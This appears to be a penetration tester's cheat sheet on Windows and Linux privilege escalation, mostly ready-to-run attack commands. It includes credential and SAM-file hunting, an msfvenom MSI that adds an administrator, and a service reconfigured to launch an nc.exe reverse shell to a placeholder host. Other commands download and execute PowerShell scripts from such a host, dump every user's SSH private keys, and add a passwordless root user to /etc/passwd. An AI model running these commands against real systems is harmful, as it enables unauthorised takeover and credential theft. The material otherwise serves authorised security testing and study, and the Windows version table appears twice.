Privilege escalation
One of the fun parts!

Windows OS Version Number
Windows 1.0 1.04
Windows 2.0 2.11
Windows 3.0 3
Windows NT 3.1 3.10.528
Windows for Workgroups 3.11 3.11
Windows NT Workstation 3.5 3.5.807
Windows NT Workstation 3.51 3.51.1057
Windows 95 4.0.950
Windows NT Workstation 4.0 4.0.1381
Windows 98 4.1.1998
Windows 98 Second Edition 4.1.2222
Windows Me 4.90.3000
Windows 2000 Professional 5.0.2195
Windows XP 5.1.2600
Windows Vista 6.0.6000
Windows 7 6.1.7600
Windows 8.1 6.3.9600
Windows 10 10.0.10240

Windows NT 3.51 NT 3.51
Windows NT 3.5 NT 3.50
Windows NT 3.1 NT 3.10
Windows 2000 NT 5.0
Windows 2000 Server
Windows 2000 Advanced Server
Windows 2000 Datacenter Server
Windows NT 4.0 NT 4.0
Windows NT 4.0 Server
Windows NT 4.0 Server Enterprise
Windows NT 4.0 Terminal Server Edition
Windows Server 2003 NT 5.2
Windows Small Business Server 2003
Windows Server 2003 Web Edition
Windows Server 2003 Standard Edition
Windows Server 2003 Enterprise Edition
Windows Server 2003 Datacenter Edition
Windows Storage Server
Windows Server 2003 R2 NT 5.2
Windows Small Business Server 2003 R2
Windows Server 2003 R2 Web Edition
Windows Server 2003 R2 Standard Edition
Windows Server 2003 R2 Enterprise Edition
Windows Server 2003 R2 Datacenter Edition
Windows Compute Cluster Server 2003 (CCS)
Windows Storage Server
Windows Home Server
Windows Server 2008 NT 6.0
Windows Server 2008 Standard
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Server 2008 for Itanium-based Systems
Windows Server Foundation 2008
Windows Essential Business Server 2008
Windows HPC Server 2008
Windows Small Business Server 2008
Windows Storage Server 2008
Windows Web Server 2008
Windows Server 2008 R2 NT 6.1
Windows Server 2008 R2 Foundation
Windows Server 2008 R2 Standard
Windows Server 2008 R2 Enterprise
Windows Server 2008 R2 Datacenter
Windows Server 2008 R2 for Itanium-based Systems
Windows Web Server 2008 R2
Windows Storage Server 2008 R2
Windows HPC Server 2008 R2
Windows Small Business Server 2011
Windows MultiPoint Server 2011
Windows Home Server 2011
Windows MultiPoint Server 2010
Windows Server 2012 NT 6.2
Windows Server 2012 Foundation
Windows Server 2012 Essentials
Windows Server 2012 Standard
Windows Server 2012 Datacenter
Windows MultiPoint Server 2012
Windows Server 2012 R2 NT 6.3
Windows Server 2012 R2 Foundation
Windows Server 2012 R2 Essentials
Windows Server 2012 R2 Standard
Windows Server 2012 R2 Datacenter
Windows Server 2016 2016 NT 10.0Windows NT 3.51 NT 3.51
Windows NT 3.5 NT 3.50
Windows NT 3.1 NT 3.10
Windows 2000 NT 5.0
Windows 2000 Server
Windows 2000 Advanced Server
Windows 2000 Datacenter Server
Windows NT 4.0 NT 4.0
Windows NT 4.0 Server
Windows NT 4.0 Server Enterprise
Windows NT 4.0 Terminal Server Edition
Windows Server 2003 NT 5.2
Windows Small Business Server 2003
Windows Server 2003 Web Edition
Windows Server 2003 Standard Edition
Windows Server 2003 Enterprise Edition
Windows Server 2003 Datacenter Edition
Windows Storage Server
Windows Server 2003 R2 NT 5.2
Windows Small Business Server 2003 R2
Windows Server 2003 R2 Web Edition
Windows Server 2003 R2 Standard Edition
Windows Server 2003 R2 Enterprise Edition
Windows Server 2003 R2 Datacenter Edition
Windows Compute Cluster Server 2003 (CCS)
Windows Storage Server
Windows Home Server
Windows Server 2008 NT 6.0
Windows Server 2008 Standard
Windows Server 2008 Enterprise
Windows Server 2008 Datacenter
Windows Server 2008 for Itanium-based Systems
Windows Server Foundation 2008
Windows Essential Business Server 2008
Windows HPC Server 2008
Windows Small Business Server 2008
Windows Storage Server 2008
Windows Web Server 2008
Windows Server 2008 R2 NT 6.1
Windows Server 2008 R2 Foundation
Windows Server 2008 R2 Standard
Windows Server 2008 R2 Enterprise
Windows Server 2008 R2 Datacenter
Windows Server 2008 R2 for Itanium-based Systems
Windows Web Server 2008 R2
Windows Storage Server 2008 R2
Windows HPC Server 2008 R2
Windows Small Business Server 2011
Windows MultiPoint Server 2011
Windows Home Server 2011
Windows MultiPoint Server 2010
Windows Server 2012 NT 6.2
Windows Server 2012 Foundation
Windows Server 2012 Essentials
Windows Server 2012 Standard
Windows Server 2012 Datacenter
Windows MultiPoint Server 2012
Windows Server 2012 R2 NT 6.3
Windows Server 2012 R2 Foundation
Windows Server 2012 R2 Essentials
Windows Server 2012 R2 Standard
Windows Server 2012 R2 Datacenter
Windows Server 2016 2016 NT 10.0

whoami
echo %username%
Which user privileges do we have?
whoami /priv
Which users are there?
net users
Maybe we are local admin already?
net localgroup administrators
Credential manager
cmdkey /list
Currently cached Kerberos tickets (and maybe some info about other network components)
klist
Are there other logged in users?
qwinsta

/usr/share/windows-binaries/fgdump/fgdump.exe
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
FGDump - aldeid
If domain controller, search for the "cpassword" within the groups.xml:
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Search for files that contain "password" in the filename:
dir /s *password*
Search for "password" in files:
findstr /si password *.ini *.xml *.txt
findstr /spin "password" *.*
Some common files:
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
Moaaahr files:
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Check if the following registry settings are set to "1"
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If so, create your own malicious MSI that will add a local user
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
And execute
msiexec /quiet /qn /i C:\hodor.msi

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
Got an error for a missing dependency?
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
Or just remove the dependency:
sc config upnphost depend= ""

List scheduled tasks
schtasks /query /fo LIST /v
Running processes linked to services
tasklist /SVC

Checks for common Windows privesc vectors
PowerTools/PowerUp.ps1 at master · PowerShellEmpire/PowerTools
GitHub
Download at target:
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')
Add to bottom:
Invoke-AllChecks
Run:
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\PowerUp.ps1
PS C:\> Invoke-AllChecks

Sherlock/Sherlock.ps1 at master · rasta-mouse/Sherlock
GitHub
Download at target:
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')
Add to bottom:
Find-AllVulns
Run:
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\Sherlock.ps1
PS C:\> Find-AllVulns

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
GitHub

Compile Windows exploit in Linux
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Compile Python script to executable
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py

ms03-026
ms03-039 (1)
ms03-039 (2)
ms03-049
ms04-007
ms04-011 - ssl bof
ms04-011 - lsasarv.dll
ms04-031
ms05-017
1ms05-039
ms06-040 (1)
ms06-040 (2)
ms06-070
ms08-067 (1)
ms08-067 (2)
ms08-067 (3)
ms09-050

ms04-011
ms04-019 (1)
ms04-019 (2)
ms04-019 (3)
ms04-020
keybd_event
ms05-018
ms05-055
ms06-030
ms06-049
print spool service
ms08-025
netdde
ms10-015
ms10-059
ms10-092
ms11-080
ms14-040
ms14-058 (1)
ms14-058 (2)
ms14-070 (1)
ms14-070 (2)
ms15-010 (1)
ms15-010 (2)
ms15-051
ms16-014
ms16-016
ms16-032

GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
GitHub
http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation
www.bhafsec.com
GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合
GitHub

cat /etc/sudoers
sudo -l
Becoming a super hero is a fairly straight forward process:
root ALL=(ALL) ALL
The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
john ALL= /sbin/poweroff
The user john can from any terminal, run the command power off using john's user password.
john ALL = (root) NOPASSWD: /usr/bin/scp
The user john can from any terminal, run the command scp as root user without password.
Below a selection of gotmi1k's privesc blog which I use a lot.

cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux

/tmp
/dev/shm

Search for password within config.php
grep -R 'password' config.php
Search at whole system
find / -type f -exec grep -H 'password' {} \; 2>/dev/null
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
Moaaar grepping
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"

find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

ps aux | grep root
ps -ef | grep root

ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/

crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab

grep -rnw '/etc/passwd' -e 'root'

authorized_keys Contains the signature of the public key of any authorised client(s), in other words specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file lets the server authenticate the user.
id_rsa Contains the private key for the client. This RSA key can be used with SSH protocols 1 or 2.
id_rsa.pub Contains the public key for the client
id_dsa Contains the private key for the client. This (insecure) DSA key only can be used with SSH protocol 2.
id_dsa.pub Contains the public key for the client
known_hosts Contains a list of host signatures for hosts the client has ever connected to.

#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
if [ -s "${X}/.ssh/id_rsa" ]; then
echo "### ${X}: "
cat "${X}/.ssh/id_rsa"
echo ""
fi
done

#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
if [ -s "${X}/.ssh/id_dsa" ]; then
echo "### ${X}: "
cat "${X}/.ssh/id_dsa"
echo ""
fi
done

Sticky bit
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or GUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

The following file has the SUID bit set:
/usr/bin/nano
We can use this to execute nano and then add a new root user to /etc/passwd. The next step is to create a password "hodor" with salt "hodor":
perl -e 'print crypt("hodor", "hodor"),"\n"'
Add to /etc/passwd using nano:
hodor:how7QNOjM.95M:0:0:root:/root:/bin/bash
Switch to new user:
su hodor

echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd

kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
*kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
*kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)

GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合
GitHub
GitHub - xairy/linux-kernel-exploitation: A collection of links related to Linux kernel security and exploitation
GitHub
Copy link
On this page
Windows
Windows versions
Users
Passwords
Search for passwords
Unquoted Service Path
AlwaysInstallElevated
upnp host
Scheduled tasks
PowerShell tools
Cross compiling
Misc
Precompiled exploits
Linux
Sudo
Distribution type & kernel version
Default writeable directory / folder
Search for passwords
Find possible other writeable directory / folder
Service(s) running as root user
Installed applications
Scheduled jobs
Search for juicy shizzle
Add user to /etc/passwd and root group
Enumeration tools
Linux local exploits
Precompiled exploits